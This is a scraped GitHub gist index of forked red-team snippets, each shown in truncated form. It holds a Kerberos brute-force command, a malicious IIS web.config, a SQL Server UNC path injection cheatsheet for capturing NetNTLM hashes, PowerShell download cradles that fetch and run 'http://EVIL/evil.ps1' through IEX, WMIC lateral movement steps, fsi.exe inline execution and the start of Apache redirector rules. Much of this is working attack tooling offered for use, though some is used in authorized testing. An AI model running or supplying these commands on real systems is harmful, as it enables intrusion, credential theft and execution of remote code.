With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
joeleonjr
joeleonjr
/ downloader web.config
Created
March 8, 2021 15:23
— forked from gazcbm/downloader web.config
Malicious web.config's
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="UTF-8"?> | |
| <configuration> | |
| <system.webServer> | |
| <handlers accessPolicy="Read, Script, Write"> | |
| <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> | |
| </handlers> | |
| <security> | |
| <requestFiltering> | |
| <fileExtensions> | |
| <remove fileExtension=".config" /> |
joeleonjr
/ SQL Server UNC Path Injection Cheatsheet
Created
February 10, 2021 17:19
— forked from nullbind/SQL Server UNC Path Injection Cheatsheet
SQL Server UNC Path Injection Cheatsheet
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| This is a list of SQL Server commands that support UNC path [injections] by default. | |
| The injections can be used to capture or replay the NetNTLM password hash of the | |
| Windows account used to run the SQL Server service. The SQL Server service account | |
| has sysadmin privileges by default in all versions of SQL Server. | |
| Note: This list is most likely not complete. | |
| ----------------------------------------------------------------------- | |
| -- UNC Path Injections Executable by the Public Fixed Server Role | |
| ----------------------------------------------------------------------- |
joeleonjr
/ DownloadCradles.ps1
Created
January 27, 2021 14:02
— forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # normal download cradle | |
| IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
| # PowerShell 3.0+ | |
| IEX (iwr 'http://EVIL/evil.ps1') | |
| # hidden IE com object | |
| $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
| # Msxml2.XMLHTTP COM object |
joeleonjr
/ wmicLateralMovement.txt
Created
January 24, 2021 20:42
— forked from G0ldenGunSec/wmicLateralMovement.txt
WMIC Service Modification for Lateral Movement
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| As always, only for use on networks you own or have permission to test against. | |
| Similar functionality to SpiderLabs SCShell (https://github.com/SpiderLabs/SCShell) but from the command line using WMIC to run commands on other systems remotely. | |
| If attempting to run multiple commands, SCShell will probably be move convenient as it automates the below steps. However, for one-offs this works fine as well. | |
| The process involves a total of four commands, three of which can be combined on the command line to form one large block. | |
| Step 1: Get the current pathName of your target service so we can restore it once we've ran our command (in our case XblAuthManager) | |
| wmic /user:DOMAIN\USERNAME /password:PASSWORD /node:TARGET_IP service where name='XblAuthManager' get pathName |
joeleonjr
/ NtMonitor.py
Created
January 17, 2021 21:43
— forked from matterpreter/NtMonitor.py
Frida script to spawn a process and monitor Native API calls
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import frida | |
| import sys | |
| def on_message(message, data): | |
| if message['type'] == 'send': | |
| print(message['payload']) | |
| elif message['type'] == 'error': | |
| print(message['stack']) | |
| else: | |
| print(message) |
joeleonjr
/ kerberos_attacks_cheatsheet.md
Created
January 17, 2021 21:41
— forked from rvrsh3ll/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
joeleonjr
/ fsharp.fsscript
Created
January 17, 2021 15:44
— forked from bohops/fsharp.fsscript
fsi.exe inline execution
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #r @"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" | |
| open System.Management.Automation | |
| open System.Management.Automation.Runspaces | |
| open System | |
| let runSpace = RunspaceFactory.CreateRunspace() | |
| runSpace.Open() | |
| let pipeline = runSpace.CreatePipeline() |
joeleonjr
/ dotnet_etw.c
Last active
January 10, 2021 17:05
— forked from xpn/dotnet_etw.c
A demo of how to collect information on basic .NET events from ETW.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #define AssemblyDCStart_V1 155 | |
| #define MethodLoadVerbose_V1 143 | |
| #include <windows.h> | |
| #include <stdio.h> | |
| #include <wbemidl.h> | |
| #include <wmistr.h> | |
| #include <evntrace.h> | |
| #include <Evntcons.h> |
joeleonjr
/ clr_via_native.c
Created
January 10, 2021 15:58
— forked from xpn/clr_via_native.c
A quick example showing loading CLR via native code
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "stdafx.h" | |
| int main() | |
| { | |
| ICLRMetaHost *metaHost = NULL; | |
| IEnumUnknown *runtime = NULL; | |
| ICLRRuntimeInfo *runtimeInfo = NULL; | |
| ICLRRuntimeHost *runtimeHost = NULL; | |
| IUnknown *enumRuntime = NULL; | |
| LPWSTR frameworkName = NULL; |
joeleonjr
/ .htaccess
Created
October 20, 2020 17:08
— forked from curi0usJack/.htaccess
FYI THIS IS NO LONGER AN .HTACCESS FILE. SEE COMMENTS BELOW. DON'T WORRY, IT'S STILL EASY.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__! | |
| # | |
| # Note this version requires Apache 2.4+ | |
| # | |
| # Save this file into something like /etc/apache2/redirect.rules. | |
| # Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom | |
| # | |
| # Include /etc/apache2/redirect.rules | |
| # |